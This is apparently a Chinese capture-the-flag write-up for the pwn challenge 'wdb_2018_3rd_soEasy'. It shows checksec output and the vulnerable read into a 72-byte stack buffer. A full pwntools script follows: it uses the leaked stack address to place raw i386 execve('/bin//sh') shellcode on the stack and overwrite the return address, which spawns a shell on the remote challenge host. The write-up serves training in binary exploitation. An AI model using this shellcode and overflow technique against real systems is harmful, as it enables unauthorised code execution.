wdb_2018_3rd_soEasy
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments
32位全没开 ,ez。。,
写shellcode栈执行
ssize_t vul()
{
char buf[72]; // [esp+0h] [ebp-48h] BYREF
printf("Hei,give you a gift->%p\n", buf);
puts("what do you want to do?");
return read(0, buf, 0x64u);
}
还给了栈地址
写完shellcode再执行栈即可
from pwn import*
from Yapack import *
context(os='linux', arch='i386',log_level='debug')
r,elf=rec("node4.buuoj.cn",28383,"./pwn",10)
ru(b'0x')
leak=int(r.recv(8),16)
li(leak)
pl=b'\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80'
pl=pl.ljust(0x48, b'\x00')+p32(0)+p32(leak)
sl(pl)
ia()